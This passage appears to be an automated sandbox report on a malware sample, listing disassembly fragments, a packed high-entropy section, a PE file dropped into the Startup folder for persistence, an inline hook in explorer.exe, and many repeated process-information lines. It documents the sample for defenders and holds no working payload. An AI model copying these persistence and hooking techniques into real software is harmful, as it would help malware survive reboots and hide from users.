          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 18_2_04C4759D push edx; retn 0004h18_2_04C475A2
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 18_2_04C40500 push eax; ret 18_2_04C405FA
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 18_2_04C4B702 push E80B905Eh; ret 18_2_04C4B709
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 18_2_04C40CEF push esp; ret 18_2_04C40CF2
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 18_2_04C40CF8 push esp; ret 18_2_04C40CFA
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 18_2_04C478CF push 8BFFFFFFh; retf 18_2_04C478D5
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 18_2_04C40B99 push ebx; ret 18_2_04C40B9A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 19_2_01019D20 push eax; retn 6A00h19_2_01019FAE
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 19_2_0502B702 push E80B905Eh; ret 19_2_0502B709
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0041D0D2 push eax; ret 21_2_0041D0D8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0041D0DB push eax; ret 21_2_0041D142
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0041D085 push eax; ret 21_2_0041D0D8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0041D13C push eax; ret 21_2_0041D142
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_00407AD0 pushad ; iretd 21_2_00407ADC
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_00405DE1 push ds; iretd 21_2_00405DE7
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0041659B push ecx; ret 21_2_004165A2
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0116D0D1 push ecx; ret 21_2_0116D0E4
          Source: initial sampleStatic PE information: section name: .text entropy: 7.93997758183

          Persistence and Installation Behavior:

          barindex
          Uses ipconfig to lookup or modify the Windows network settingsShow sources
          Source: unknownProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe

          Boot Survival:

          barindex
          Drops PE files to the startup folderShow sources
          Source: C:\Windows\SysWOW64\wscript.exePE file moved: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeJump to behavior

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x2E 0xE0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
